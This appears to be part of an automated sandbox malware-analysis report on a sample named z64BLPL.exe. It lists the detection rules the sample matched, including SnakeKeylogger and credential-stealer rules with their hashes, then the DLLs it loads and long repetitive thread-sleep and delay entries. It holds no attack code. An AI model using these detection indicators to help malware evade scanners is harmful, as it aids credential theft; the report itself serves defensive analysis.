Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs z64BLPL.exe |
Source: z64BLPL.exe, 00000000.00000002.4119946936.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z64BLPL.exe |
Source: z64BLPL.exe, 00000000.00000000.1673826294.00000000006D6000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe |
Source: z64BLPL.exe |
Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: z64BLPL.exe, .cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: z64BLPL.exe, -J--.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: z64BLPL.exe, -J--.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599765 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599636 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599531 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599421 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599312 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599203 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599093 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598984 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598875 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598765 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598656 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598546 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598437 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598328 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598218 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598109 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597996 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597888 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597741 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597637 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597531 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597417 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597312 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597203 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597093 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596984 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596875 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596765 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596656 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596547 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596437 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596328 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596217 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596109 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596000 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595890 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595672 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595547 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595437 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595328 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595218 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595109 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594993 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594890 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594781 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594671 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594562 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -26747778906878833s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -600000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599875s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368 |
Thread sleep count: 8582 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368 |
Thread sleep count: 1284 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599765s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599636s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599531s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599421s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599312s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599203s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599093s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598984s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598875s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598765s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598656s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598546s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598437s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598328s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598218s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597996s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597888s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597741s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597637s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597531s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597417s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597312s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597203s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597093s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596984s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596875s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596765s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596656s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596547s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596437s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596328s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596217s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595890s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595781s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595672s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595547s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595437s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595328s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595218s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594993s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594890s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594781s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594671s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594562s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599765 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599636 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599531 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599421 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599312 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599203 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599093 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598984 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598875 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598765 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598656 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598546 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598437 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598328 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598218 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598109 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597996 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597888 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597741 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597637 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597531 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597417 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597312 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597203 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597093 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596984 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596875 |
Jump to behavior |
